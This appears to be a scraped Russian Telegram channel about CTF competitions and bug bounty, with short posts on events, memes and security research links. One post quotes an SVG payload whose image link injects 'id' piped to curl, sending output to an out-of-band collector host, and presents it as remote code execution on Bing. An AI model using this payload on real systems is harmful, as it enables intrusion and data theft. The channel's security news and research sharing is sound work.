k3vg3n ch
СтатистикаЛоги мыслей. Об информационной безопасности (CTF, багбаунти) и не только. Все материалы, опубликованные на канале, предназначены исключительно для образовательных и информационных целей. Автор не несет ответственности за любые действия.
- Последний пост
- 15 авг.
- Последнее чтение
- 12:58
- Постов за неделю
- 3
- Всего постов
- 28
- Тип
- открытый
- Язык
- русский
- В каталоге с
- 12 авг.
- 1/24сутки в ленте
- 340
- 1/48двое суток
- 389
- 1/72трое суток
- 420
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
Наткнулся на одну цтфку, их тайминги: 1. Квалишься 2. Едешь на полуфинал в Монголию 5 сентября 3. Возвращаешься(?!), ждешь 20 дней, снова едешь в Монголию на финал 24 сентября 4. Получаешь TBD в качестве приза
видео или голосовое, без подписи
видео или голосовое, без подписи
opus5: Я не буду делать, сделай ты. opus4.8: Нет, пусть человек сам делает. #meme
Смотрим первую CTF-дуэль DUCKERZ! https://www.twitch.tv/duckerz_hub
Смотрим первую CTF-дуэль DUCKERZ! https://www.twitch.tv/duckerz_hub
<?xml version="1.0"?> <svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"> <image href="|id | curl -d @- https://[OOB-COLLECTOR]/output" width="1" height="1"/> </svg> Всё. root в bing. https://xbow.com/blog/bing-images-rce-vulnerabilities
Гугл хочет принять странное решение ограничить установку приложений на android, петицию против подписали уже более 200 000 человек. https://keepandroidopen.org/
Наш канал становится популярным — появился фейк-бот, мимикрирующий под k3vg3n_ch. Хочу отметить, что мы не имеем отношения к данному боту и другим возможным фейкам. Официальный и единственный канал в телеграм — @k3vg3n_ch.
На 1️⃣2️⃣3️⃣4️⃣5️⃣6️⃣7️⃣ открылась регистрация на Пляжный сезон! Пляжный сезон стартует на нашей платформе уже 2 августа и продлится до 31 августа. Этот сезон пройдёт в формате турнира на выбывание с дуэлями 1 на 1. Регистрация участников на основной этап сезона будет открыта в течение недели, с 15.07 по 22.07. На основании заявок будет отобрано 16 человек, которые будут участвовать в турнире. Все дуэли будут проходить в прямом эфире, участники будут решать задания в реальном времени и транслировать экран, а ведущие комментировать происходящее. Для участников, не прошедших отбор, а также пользователей платформы, не подававших заявку, во время сезона будут выложены отдельные задания, анонс которых будет проходить на стримах. За решение этих заданий предусмотрен отдельный призовой фонд. Спонсором сезона выступает 🐂 BI.ZONE Bug Bounty Призы за турнир: 🐥1 место – мерч от BI.ZONЕ Bug Bounty и секретный суперприз 🐥2 место – мерч от BI.ZONЕ Bug Bounty и DUCKERZ 🐥3 место – мерч от BI.ZONЕ Bug Bounty Призы за сезонные задания: 🐥 1-3 место – мерч от BI.ZONЕ Bug Bounty Подать заявку на участие: 👉 Регистрация 👈 🐥 Канал | 🐥 Чат | 🐥 Платформа | 🐂 Спонсор сезона | 🪲 тг канал
Команда исследования уязвимостей BI.ZONE обнаружила цепочку OnlyShells в OnlyOffice, позволяющую получить шелл от NT AUTHORITY\SYSTEM при открытии специально сформированного файла. Уязвимости мы нашли ещё в 2025, но долго ждали пока вендор всё исправит. Мы написали статью с подробным описанием всех уязвимостей из цепочки.
Во время пайки к UART забыл отключить питание и прошелся по контактам чипа. Что-то щелкнуло, померещился дымок. Ребутнул — светодиод состояния вроде горит. Теперь у меня камера Шрёдингера.
Лотерея, как там её....IoT девайсы. Ещё, ещё одно устройство, и там точно будет такоооой баг, баунти от которого покроет все N ранее купленных умных колонок.
Google CTF перенесен DownUnderCTF отменен Кто следующий?
OtterSec выделяет $100 000 на сохранение CTF в эпоху ИИ. Компания может выступить спонсором соревнований, где введены методы борьбы с ИИ. Ещё в статье проведен анализ формата jeopardy до и после появления LLM. Советую прочитать: https://osec.io/blog/save-ctfs-fund/
Исследование от китайских студентов. Программа на изолированном хосте преобразует данные в незначительное изменение цвета пикселя, что сильно сказывается на электромагнитном излучении кабеля.
Завершился Standoff Hacks. Сдал мало отчётов, зато все были найдены ручками, без ИИ.
SQLinj bypass techniques
https://bumsrake.de/
From grafana to access 500+ private repositories. https://sectricity.com/blog/misconfigured-grafana-507-private-meta-repos/